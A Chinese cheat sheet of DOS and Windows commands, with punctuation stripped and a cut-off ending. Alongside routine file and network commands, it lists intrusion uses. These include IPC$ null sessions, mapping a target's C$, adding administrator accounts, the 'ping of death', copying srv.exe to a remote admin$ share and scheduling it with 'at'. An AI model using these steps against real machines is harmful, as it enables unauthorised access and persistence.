盘符 路径 目录名 功能 建立一个新目录 例 del 使用方法 del 盘符 路径 文件名 功能 删除一个或多个文件 可以使用通配符 例 删除一个文件 按此在新窗口浏览图片 删除扩展名为 sys 的文件 按此在新窗口浏览图片 删除所有文件 deltree 使用方法 deltree 盘符 路径 目录名 功能 删除一个目录 删除目录同时将删除目录中的所有文件 例 ren 使用方法 ren 盘符 路径 原文件名 修改后文件名 功能 修改文件名 例 type 使用方法 type 盘符 路径 文件名 功能 显示文件内容 只能显示文本文件 例 copy 使用方法 copy 盘符 路径 源文件名 盘符 路径 目标文件名 功能 复制一个或一类文件 如果不指明目标文件名 则默认为目标文件名与源文件名相 同 net use ip ipc user 建立 IPC 空链接 net use ip ipc 密码 user 用户名 建立 IPC 非空链接 net use h ip c 密码 user 用户名 直接登陆后映射对方 C 到本地为 H net use h ip c 登陆后映射对方 C 到本地为 H net use ip ipc del 删除 IPC 链接 net use h del 删除映射对方到本地的为 H 的映射 net user 用户名 密码 add 建立用户 net user guest active yes 激活 guest 用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 add 把 用户 添加到管理员中使其具有管理员权限 注意 administrator 后加 s 用复数 net start 查看开启了哪些服务 net start 服务名 开启服务 如 net start telnet net start schedule net stop 服务名 停止 某服务 net time 目标 ip 查看对方时间 net time 目标 ip set 设置本地计算机时间与 目标 IP 主机的时间同步 加上参数 yes 可 取消确认信息 net view 查看本地局域网内开启了哪些共享 net view ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断 开连接的共享 net pause 服务名 暂停某服务 net send ip 文本信息 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc 开启 ipc 共享 net share ipc del 删除 ipc 共享 net share c del 删除 C 共享 net user guest 12345 用 guest 用户登陆后用将密码改为 12345 net password 密码 更改系统 登陆密码 netstat a 查看开启了哪些端口 常用 netstat an netstat n 查看端口的网络连接情况 常用 netstat an netstat v 查看正在进行的工作 netstat p 协议名 例 netstat p tcq ip 查看某协议使用情况 查看 tcp ip 协议使用情况 netstat s 查看正在使用的所有协议使用情况 nbtstat A ip 对方 136 到 139 其中一个端口开了的话 就可查看对方最近登陆的用户名 03 前的为用户名 注意 参数 A 要大写 tracert 参数 ip 或计算机名 跟踪路由 数据包 参数 w 数字 用于设置超时间隔 ping ip 或域名 向对方主机发送默认大小为 32 字节的数据 参数 l 空格 数据包大小 n 发送数据次数 t 指一直 ping ping t l 65550 ip 死亡之 ping 发送大于 K 的文件并一直 ping 就成了死亡之 ping ipconfig winipcfg 用于 windows NT 及 XP windows 95 98 查看本地 ip 地址 ipconfig 可用参 数 all 显示全部配置信息 tlist t 以树行列表显示进程 为系统的附加工具 默认是没有安装的 在安装目录的 Support tools 文件夹内 kill F 进程名 加 F 参数后强制结束某进程 为系统的附加工具 默认是没有安装的 在安装 目录的 Support tools 文件夹内 del F 文件名 加 F 参数后就可删除只读文件 AR AH AS AA 分别表示删除只读 隐藏 系统 存档文件 A R A H A S A A 表示删除除只读 隐藏 系统 存档以外的文件 例如 DEL AR 表示删除当前目录下所有只读文件 DEL A S 表示删除当前目录 下除系统文件以外的所有文件 del S Q 目录 或用 rmdir s Q 目录 S 删除目录及目录下的所有子目录和文件 同时使用 参数 Q 可取消删除操作时的系统确认就直接删除 二个命令作用相同 move 盘符 路径 要移动的文件名 存放移动文件的路径 移动后文件名 移动文件 用参数 y 将取消确认移动目录存在相同文件的提示就直接覆盖 fc one txt two txt 3st txt 对比二个文件并把不同之处输出到 3st txt 文件中 和 是 重定向命令 at id 号 开启已注册的某个计划任务 at delete 停止所有计划任务 用参数 yes 则不需要确认就直接停止 at id 号 delete 停止 某个已注册的计划任务 at 查看所有的计划任务 at ip time 程序名 或一个命令 r 在某时间运行对方某程序并重新启动计算机 finger username host 查看最近有哪些用户登陆 telnet ip 端口 远和登陆服务器 默认端口 为 23 open ip 连接到 IP 属 telnet 登陆后的命令 telnet 在本机上直接键入 telnet 将进入本机的 telnet copy 路径 文件名 1 路径 文件名 2 y 复制文件 1 到指定的目录为文件 2 用参数 y 就同时 取消确认你要改写一份现存目录文件 copy c srv exe ip admin 复制本地 c srv exe 到对方的 admin 下 cppy 1st jpg b 2st txt a 3st jpg 将 2st txt 的内容藏身到 1st jpg 中生成 3st jpg 新的文件 注 2st txt 文件头要空三排 参数 b 指二进制文件 a 指 ASCLL 格式文件 copy ip admin svv exe c 或 copy ip admin 复